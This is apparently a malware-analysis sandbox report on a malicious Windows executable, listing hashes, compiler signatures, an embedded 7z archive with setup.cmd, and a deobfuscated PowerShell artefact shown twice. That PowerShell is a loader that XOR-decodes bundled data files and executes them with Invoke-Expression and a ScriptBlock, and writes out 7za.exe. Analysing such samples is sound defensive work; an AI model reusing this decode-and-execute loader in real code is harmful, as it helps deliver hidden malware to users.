Malicious
Malicious

6a53423827f43647cd5f0b23ab785f7e

PE Executable
|
MD5: 6a53423827f43647cd5f0b23ab785f7e
|
Size: 2.34 MB
|
application/x-dosexec

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
6a53423827f43647cd5f0b23ab785f7e
Sha1
701329d9ef8c36ef89e402d25ba1b76dcb2ff14b
Sha256
ff9fe19f2fe7148190131b48fc6e92a4a33569c990009edf87737e4cbe56cf29
Sha384
8683c0c2f50e749fae11a0fbfc33c9d4fa48fdb2ba35d774bdf67937f262cd2313ade97f4aa44ba61316682d90807727
Sha512
1975d00b2c9fa9d7023a432e2007235ee3c973fcc2194f545ffd3ffcde704941ef091347ec005ecfb666766b9805a1bb5d63239586b09dbf36688ffdd8a2837e
SSDeep
49152:AgwRW3PSS0qm4ZqQn+NNozrP4Fw+JGTb1/t08EHBDlW:AgwR8k2dnAezAw+Ji1/rUZW
TLSH
BEB5331137E3CCF5F589663225919BA23D9BFB2103E653DF3BDC2A9208205C5D9F0A96

PeID

Microsoft Visual C++
Microsoft Visual C++ 5.0
Microsoft Visual C++ 6.0 DLL (Debug)
Microsoft Visual C++ v6.0
Microsoft Visual C++ v6.0
Microsoft Visual C++ v6.0 DLL
File Structure
6a53423827f43647cd5f0b23ab785f7e
Malicious
7z-stream @ 0x000224A1.7z
Malicious
data.bin
data1.bin
data2.bin
data3.bin
setup.cmd
Malicious
[Deobfuscated PS]
Malicious
Overlay_917df09d.bin
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rdata
.data
.rsrc
Resources
RT_ICON
ID:0001
ID:1033
ID:1033-preview.png
ID:0002
ID:1033
ID:0003
ID:1033
ID:0004
ID:1033
RT_GROUP_CURSOR4
ID:0001
ID:1033
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

Overlay extracted: Overlay_917df09d.bin (2202263 bytes)
Artefacts
Name
 Value
Deobfuscated PowerShell

@({ Write-Output "off%" } )[1] function encode($data, [int] $key) $step = ($key -Rem 10) + 1 $len = 0 return $data | ForEach-Object $key = ($key -Rem 255) + 1 $_ -bxor $key $key += $step $len if (Test-Path "data5.bin" -PathType "Leaf") { $binaryData = [File]::"ReadAllBytes"("data5.bin") $encodedData = encode -data $binaryData -key 12199 Invoke-Expression ([Encoding]::"UTF8"."GetString"($encodedData)) } if (Test-Path "data.bin") { $binaryData = [File]::"ReadAllBytes"("data.bin") $encodedData = encode -data $binaryData -key 12199 & ([ScriptBlock]::"Create"([Encoding]::"UTF8"."GetString"($encodedData))) } $binaryData = [File]::"ReadAllBytes"("data1.bin") $encodedData = encode -data $binaryData -key 12199 [File]::"WriteAllBytes"("7za.exe", $encodedData)
6a53423827f43647cd5f0b23ab785f7e (2.34 MB)
File Structure
6a53423827f43647cd5f0b23ab785f7e
Malicious
7z-stream @ 0x000224A1.7z
Malicious
data.bin
data1.bin
data2.bin
data3.bin
setup.cmd
Malicious
[Deobfuscated PS]
Malicious
Overlay_917df09d.bin
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rdata
.data
.rsrc
Resources
RT_ICON
ID:0001
ID:1033
ID:1033-preview.png
ID:0002
ID:1033
ID:0003
ID:1033
ID:0004
ID:1033
RT_GROUP_CURSOR4
ID:0001
ID:1033
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
Deobfuscated PowerShell

@({ Write-Output "off%" } )[1] function encode($data, [int] $key) $step = ($key -Rem 10) + 1 $len = 0 return $data | ForEach-Object $key = ($key -Rem 255) + 1 $_ -bxor $key $key += $step $len if (Test-Path "data5.bin" -PathType "Leaf") { $binaryData = [File]::"ReadAllBytes"("data5.bin") $encodedData = encode -data $binaryData -key 12199 Invoke-Expression ([Encoding]::"UTF8"."GetString"($encodedData)) } if (Test-Path "data.bin") { $binaryData = [File]::"ReadAllBytes"("data.bin") $encodedData = encode -data $binaryData -key 12199 & ([ScriptBlock]::"Create"([Encoding]::"UTF8"."GetString"($encodedData))) } $binaryData = [File]::"ReadAllBytes"("data1.bin") $encodedData = encode -data $binaryData -key 12199 [File]::"WriteAllBytes"("7za.exe", $encodedData)

Malicious

6a53423827f43647cd5f0b23ab785f7e > 7z-stream @ 0x000224A1.7z > setup.cmd
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙